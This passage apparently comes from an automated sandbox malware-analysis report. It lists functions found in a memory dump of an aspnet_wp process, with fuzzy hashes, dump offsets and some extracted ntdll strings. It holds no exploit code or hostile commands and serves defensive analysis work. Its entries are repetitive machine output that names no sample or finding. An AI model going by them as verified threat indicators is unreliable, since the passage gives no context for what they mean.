Opcode Fuzzy Hash: 744aba869b768fb21f0735007c12407cf2c521bc66db325777ea0958ca56c2f6
Instruction Fuzzy Hash: 4B90022B21351002D1807198544960A005597D2212FD9D415A001559CCCE1589695321

Function 05513D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26a99fced332cbe86feb533ec187936edb6412fadc212f620218897e94a34349
Instruction ID: be031cbfbc3f8676f05f12c7bb8b6a77d488c7e12ad2b454b6f4c9820cc24ef9
Opcode Fuzzy Hash: 26a99fced332cbe86feb533ec187936edb6412fadc212f620218897e94a34349
Instruction Fuzzy Hash: 7990023320251142954072985845A4E415597E2312BD9D415A0015598CCE1489615321

Function 05512D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c4609e49252f8b1bd472c44b63678f04d678e7d765df996d1880fd4f007ba6f
Instruction ID: bc6eea56c6463e766bffc84e427e7a866236e855a1c2c64430b798c5a769e368
Opcode Fuzzy Hash: 0c4609e49252f8b1bd472c44b63678f04d678e7d765df996d1880fd4f007ba6f
Instruction Fuzzy Hash: 4D90022320555442D10075985449A06005597D1215F99D011A10645D9DCF358951A231

Function 05512D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09539cd9eb084578cbad72690786677046843d86c022aecfcdeb96a997fe495a
Instruction ID: c07fd5fb244bf93d0c49c94895e07ae20e3b8192ccce1aaa69cc53dcecff0440
Opcode Fuzzy Hash: 09539cd9eb084578cbad72690786677046843d86c022aecfcdeb96a997fe495a
Instruction Fuzzy Hash: 6490022330151003D140719854596064055E7E2311F99D011E0414598CDE1589565322

Function 05512DD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdb13b5bcb14c9a7937ea7c91244c6694f411374e92bb88288836b7fba0ad5e2
Instruction ID: f1ff3931f3cb132ffc08eaa4aa4173a4c51098581da1f29fca338595d3aafa4e
Opcode Fuzzy Hash: fdb13b5bcb14c9a7937ea7c91244c6694f411374e92bb88288836b7fba0ad5e2
Instruction Fuzzy Hash: 90900223242551525545B19844455074056A7E12517D9C012A1414994C8E269956D721

Function 05512DB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bf8c0a045ec151ffd40c13c2539a2a4749181b9bd1f0714ccbe18dbe4a239e8
Instruction ID: 17a387177126286031d673045c0d53095aadba5f50755e42300fc88052ab5f53
Opcode Fuzzy Hash: 3bf8c0a045ec151ffd40c13c2539a2a4749181b9bd1f0714ccbe18dbe4a239e8
Instruction Fuzzy Hash: A090023324151402D141719844456060059A7D1251FD9C012A0424598E8F558B56AB61

Function 05512C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfd98563e84a06390b877b9e72ac5066e22e5e684e58a20ead0b45a01867f0d7
Instruction ID: 2d91da290e178143d1b74c03253937ebf16aada7d596eb6b037c7260340e5b8d
Opcode Fuzzy Hash: dfd98563e84a06390b877b9e72ac5066e22e5e684e58a20ead0b45a01867f0d7
Instruction Fuzzy Hash: B090023320151842D10071984445B46005597E1311F99C016A0124698D8F15C9517621

Function 05512CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cbcf855121496223f70445193dbe209aec0860f6b4a6dc44d2d6001b8e1d2cf
Instruction ID: 5bd07ed38e84847c99a4c692588c3308017ce7406ae41296f2c378fc80eeb2a9
Opcode Fuzzy Hash: 7cbcf855121496223f70445193dbe209aec0860f6b4a6dc44d2d6001b8e1d2cf
Instruction Fuzzy Hash: DB90022360551402D14071985459706006597D1211F99D011A0024598DCF598B5567A1

Function 05512CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d11de459d211ecd6221f58cbff8cb205db7ce2b27b73c8cf09375dc52b596613
Instruction ID: a41baf06f995260383bee3b6ee8ea723b40a846226d4061fc681a5afe4891575
Opcode Fuzzy Hash: d11de459d211ecd6221f58cbff8cb205db7ce2b27b73c8cf09375dc52b596613
Instruction Fuzzy Hash: 0F90023320151403D10071985549707005597D1211F99D411A042459CDDF5689516221

Function 05512CA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c2078641a5c92b1d9810cd7718811c8bb085e7491de3c93bff9b8f81b878810
Instruction ID: a8e777bc08dafabc51f7e6fc5146130ea06fea0d88bc8c587405dee565baa74b
Opcode Fuzzy Hash: 2c2078641a5c92b1d9810cd7718811c8bb085e7491de3c93bff9b8f81b878810
Instruction Fuzzy Hash: 4290023320151402D10075D85449646005597E1311F99D011A5024599ECF6589916231

Function 05512F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfd8265184e638ee8969f84cf69cbdedfa3bb1cf3a96ad67eeac89f56d7e2d20
Instruction ID: 41837412a9ac3f905369746256d9de97f86f5c99dad9b96fcf081ebae72c872b
Opcode Fuzzy Hash: bfd8265184e638ee8969f84cf69cbdedfa3bb1cf3a96ad67eeac89f56d7e2d20
Instruction Fuzzy Hash: 0890026321151042D10471984445706009597E2211F99C012A2154598CCE298D615225

Function 05512F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 048a085b6e92f1f9ece79b41054c33e5f721e2a54b3443b4a9545ffccb5ac1a7
Instruction ID: 47d7e3c8b8e1d9520181f8a44bf29a025935a1791276f84c2929de15f7ab9f5b
Opcode Fuzzy Hash: 048a085b6e92f1f9ece79b41054c33e5f721e2a54b3443b4a9545ffccb5ac1a7
Instruction Fuzzy Hash: 3090026334151442D10071984455B060055D7E2311F99C015E1064598D8F19CD526226

Function 05512FE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6423513a7edcdc56ca8d6ccbc4ebb585417388d89c9a1559a9e96acfc9d8c811
Instruction ID: 5d2ecb0a2a05345dcf7021a14775f41e7696884ebd8b7681893dd9f372612a51
Opcode Fuzzy Hash: 6423513a7edcdc56ca8d6ccbc4ebb585417388d89c9a1559a9e96acfc9d8c811
Instruction Fuzzy Hash: B1900223211D1042D20075A84C55B07005597D1313F99C115A0154598CCE1589615621

Function 05512F90 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b104d8c7c8bd740656756e7078a87f665ee6ac6212f600b69702649b3a61a56e
Instruction ID: 719ed8a022e02833f8a42b6bcb9659fd7acfc130ce07b094724a74455580e702
Opcode Fuzzy Hash: b104d8c7c8bd740656756e7078a87f665ee6ac6212f600b69702649b3a61a56e
Instruction Fuzzy Hash: AA90023320191402D1007198485570B005597D1312F99C011A1164599D8F2589516671

Function 05512FB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bbe6e1c707a05065e368d04d3b56fb7e6b18ee1e27773698a0b10b5241b874c
Instruction ID: 16182b9444c6b3eee98ee6f102c645a0114d821b1ad1082577eec5160ea81ae8
Opcode Fuzzy Hash: 0bbe6e1c707a05065e368d04d3b56fb7e6b18ee1e27773698a0b10b5241b874c
Instruction Fuzzy Hash: 0D90022360151042414071A888859064055BBE2221799C121A0998594D8E5989655765

Function 05512FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a21f46904f0cafddedefde7d2bcd4880d610751c64f1fd33b5887bfc4c081c40
Instruction ID: bc34163a8f5553f5ddcdee6e8b57f5e79cb4bb55a8c58a0469e8d81f1795bae4
Opcode Fuzzy Hash: a21f46904f0cafddedefde7d2bcd4880d610751c64f1fd33b5887bfc4c081c40
Instruction Fuzzy Hash: 0690023320191402D10071984849747005597D1312F99C011A5164599E8F65C9916631

Function 05512E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fb5d0315b7b6fba5e2e235d51479d4ad95719211c6865b09ffeeebb946519ca
Instruction ID: 88e0ca499a0e0dae1469dcf0926bde55ddf286f19112ae130084c63481f16788
Opcode Fuzzy Hash: 5fb5d0315b7b6fba5e2e235d51479d4ad95719211c6865b09ffeeebb946519ca
Instruction Fuzzy Hash: EB90022330151402D102719844556060059D7D2355FD9C012E1424599D8F258A53A232

Function 05512EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02845633c87a0c2dc26393585bdb3043d5115f62000baae9cef7c2a5580ea005
Instruction ID: 84bcd5b5a44eff57ae0055ca3860812f238b74083b16dc3ef3c0e62d129e6df8
Opcode Fuzzy Hash: 02845633c87a0c2dc26393585bdb3043d5115f62000baae9cef7c2a5580ea005
Instruction Fuzzy Hash: ED90026320191403D14075984845607005597D1312F99C011A2064599E8F298D516235

Function 05512E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 429cb9a4a9ae9f66c5060abba43f50c6fef18d06936b208062a2ee8c630b4ff1
Instruction ID: 7f72831674511e4c714c5db4f78d7804803fa7ba83b844e5fa5030d84d7731ae
Opcode Fuzzy Hash: 429cb9a4a9ae9f66c5060abba43f50c6fef18d06936b208062a2ee8c630b4ff1
Instruction Fuzzy Hash: 9A90022360151502D10171984445616005A97D1251FD9C022A1024599ECF258A92A231

Function 05512EA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c94e7ed7f759f7ec33092a71ef38ff3d9e5e84288d353689669e27aae02dadf6
Instruction ID: d83e404689608b4bc078c4beb3e8550020fc54a0e3deb02406d7c34f132c0e0b
Opcode Fuzzy Hash: c94e7ed7f759f7ec33092a71ef38ff3d9e5e84288d353689669e27aae02dadf6
Instruction Fuzzy Hash: 4690027320151402D14071984445746005597D1311F99C011A5064598E8F598ED56765

Function 055139B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e8346f30f056f665aa8e902172d7cf323859d42b03191fb80575728f3b333c8
Instruction ID: 133b4e24cc75d85effe33c18c3f2e0218da51cec2492629f9d32d982aba7b0b0
Opcode Fuzzy Hash: 5e8346f30f056f665aa8e902172d7cf323859d42b03191fb80575728f3b333c8
Instruction Fuzzy Hash: 8E90022324556102D150719C44456164055B7E1211F99C021A08145D8D8E5589556321

Function 05512BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a128a22d9c87c3c886ce70d9f197c34bf280b922d006e95d67c86be926611802
Instruction ID: 9e72dfd6a8c38f3c05fdb08d69ca9baadb5a44700f1499929c763cfd15a146ed
Opcode Fuzzy Hash: a128a22d9c87c3c886ce70d9f197c34bf280b922d006e95d67c86be926611802
Instruction Fuzzy Hash: 9190023320151802D1807198444564A005597D2311FD9C015A0025698DCF158B5977A1

Function 05512BE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3091d5f4f81a3b04e098909938de759e13d13cd4440ffa55f99b9992d7e5d402
Instruction ID: 2c5185a210c5bb0e506beda69c3a7cd0ae333311e7a53f9d3863d7f2d50aed11
Opcode Fuzzy Hash: 3091d5f4f81a3b04e098909938de759e13d13cd4440ffa55f99b9992d7e5d402
Instruction Fuzzy Hash: 8F90023320555842D14071984445A46006597D1315F99C011A00646D8D9F258E55B761

Function 05512B80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e2bfb794e7355b04499147292d590b791725371d0acdade82e9bacdaf19be7d
Instruction ID: 9ddcae689257e96affc2835a06645936df3307bad450d3d844c909a01321f160
Opcode Fuzzy Hash: 6e2bfb794e7355b04499147292d590b791725371d0acdade82e9bacdaf19be7d
Instruction Fuzzy Hash: 1F90023320151802D10471984845686005597D1311F99C011A6024699E9F6589917231

Function 05512BA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46699e9db022b1c6579f428b41fbd649f943bde0f97d90043bfe8b2ec7fef21c
Instruction ID: db60874c742a9ea81729aa2e500dd825c84c6fc859dccfc49c9d539897160938
Opcode Fuzzy Hash: 46699e9db022b1c6579f428b41fbd649f943bde0f97d90043bfe8b2ec7fef21c
Instruction Fuzzy Hash: 7390023360551802D15071984455746005597D1311F99C011A0024698D8F558B5577A1

Function 05512AD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3d5522fd20c2cc3d22a47217ded9a8b656f6742914c48805e277b234bf816e0
Instruction ID: 0c25b23ce2196c84c294064c888ef724d4952f78e7e2929e2878c76ac5bf5a3f
Opcode Fuzzy Hash: f3d5522fd20c2cc3d22a47217ded9a8b656f6742914c48805e277b234bf816e0
Instruction Fuzzy Hash: C9900227211510030105B5980745507009697D6361399C021F1015594CDF2189615221

Function 05512AF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ac27188e310cdfb82339ed4ac681704fda1617596961b598e9c35d770fb2529
Instruction ID: bb1ab9fdb021f3afc4f5314ac790d24d7a9a018704d882f0a3627ea9cb390a28
Opcode Fuzzy Hash: 7ac27188e310cdfb82339ed4ac681704fda1617596961b598e9c35d770fb2529
Instruction Fuzzy Hash: 45900227221510020145B598064550B0495A7D73613D9C015F14165D4CCF2189655321

Function 05512AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54a48b9a250e204da934cd071f270a493c95bcaa33b8c44888406752150a7a3e
Instruction ID: f03dfeef03157b88cb651e17aae0fd65a78ae3efde41d23c2dc67cfa633bf361
Opcode Fuzzy Hash: 54a48b9a250e204da934cd071f270a493c95bcaa33b8c44888406752150a7a3e
Instruction Fuzzy Hash: 249002A3201650924500B2988445B0A455597E1211B99C016E10545A4CCE2589519235

Function 05512C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 76e946aaa99a6fec775f3cc21480c09753eb6ba793f775e7abca9329f3b1767c
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 05512890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0551293C
___swprintf_l.LIBCMT ref: 0551295E
___swprintf_l.LIBCMT ref: 055129A3
___swprintf_l.LIBCMT ref: 0554A52E

Strings

:%u.%u.%u.%u, xrefs: 0554A5B8
::ffff:0:%u.%u.%u.%u, xrefs: 0554A54E
ffff:, xrefs: 0554A504
::%hs%u.%u.%u.%u, xrefs: 0554A527

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: e581ab8fb922617e21f7e20d870751e1d5ec4a0d6985f62bcd09800a73f7ce17
Instruction ID: c75b328dc3540183d1dd80dad19f366a1cdba261a47d42643a6901a48ed7119a
Opcode Fuzzy Hash: e581ab8fb922617e21f7e20d870751e1d5ec4a0d6985f62bcd09800a73f7ce17
Instruction Fuzzy Hash: A35108BAA04256BFEF10DF9DC9809BEFBB9BB48200F508569E855D7641D634DE408BE0

Function 05507630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05544742
ExecuteOptions, xrefs: 055446A0
Execute=1, xrefs: 05544713
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 055446FC
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05544725
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05544655
CLIENT(ntdll): Processing section info %ws..., xrefs: 05544787

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 9b147ee6c81aece91f0abc29aec9e8ebeec60fdf3e497c44cc39caf6f090145c
Instruction ID: 7f812822773ec8191310bec20d08ae87dd6f2074d9a52ea560b3a5e087dff7c1
Opcode Fuzzy Hash: 9b147ee6c81aece91f0abc29aec9e8ebeec60fdf3e497c44cc39caf6f090145c
Instruction Fuzzy Hash: 65510671710219BAEF10EAA4DC99FFA77B9FF48304F54149AE506A71C0DB70AA45CEA0

Function 0551B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0551B6BF

Strings

+, xrefs: 0551B65A
0, xrefs: 0551B66F
-, xrefs: 0551B650
0, xrefs: 0551B695

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction ID: 83645d1d0932dcf362b78de2f7082a53bcb43985a81cc2a2b87f8c756bc424ff
Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction Fuzzy Hash: 4681A170E052499EFF24CE68C451BBEBFA2BF55730F184659DC92A7290CB349941C768

Function 0550BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Resource at %p, xrefs: 05547B8E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05547B7F
RTL: Re-Waiting, xrefs: 05547BAC

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 01c7c09f58cffa2cc43a771e56add04d8795a1a12586665def2f239138375050
Instruction ID: c72831db7f05ec892b381036c2e749ae120b18f261360d0704fc5845b64dba4d
Opcode Fuzzy Hash: 01c7c09f58cffa2cc43a771e56add04d8795a1a12586665def2f239138375050
Instruction Fuzzy Hash: 0441B0753047029FD724DE25C881B6AB7E6FF89720F100A1DF95A9B680EB71E8458B91

Function 0550B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0554728C

Strings

RTL: Resource at %p, xrefs: 055472A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05547294
RTL: Re-Waiting, xrefs: 055472C1

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: fc784cde4a264eb851a3950dc6acbb9887259c045ec11f970db7481be1b8cfc0
Instruction ID: 6f90bb6a0c0d00433f3f61ff9938a989604107db2b5460c00c938da1b8fab756
Opcode Fuzzy Hash: fc784cde4a264eb851a3950dc6acbb9887259c045ec11f970db7481be1b8cfc0
Instruction Fuzzy Hash: 2E41CF71708202ABD721DE65CC81F6AB7A6FF88724F100A19F855AB280DB71E942CBD1

Function 05517D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 05517E8B

Strings

-, xrefs: 05517DDD
+, xrefs: 05517DE8

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction ID: e02be88c95a33ee13f7948ef73fc94345b42a69e2339f8dcefc23c7640d9c66b
Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction Fuzzy Hash: 94919471E1420A9AFF24DE6DC880ABFBFA6FF48360F14461AEC55E72C0D73499418758

Function 054D9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 054D9191
@, xrefs: 054D9175

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

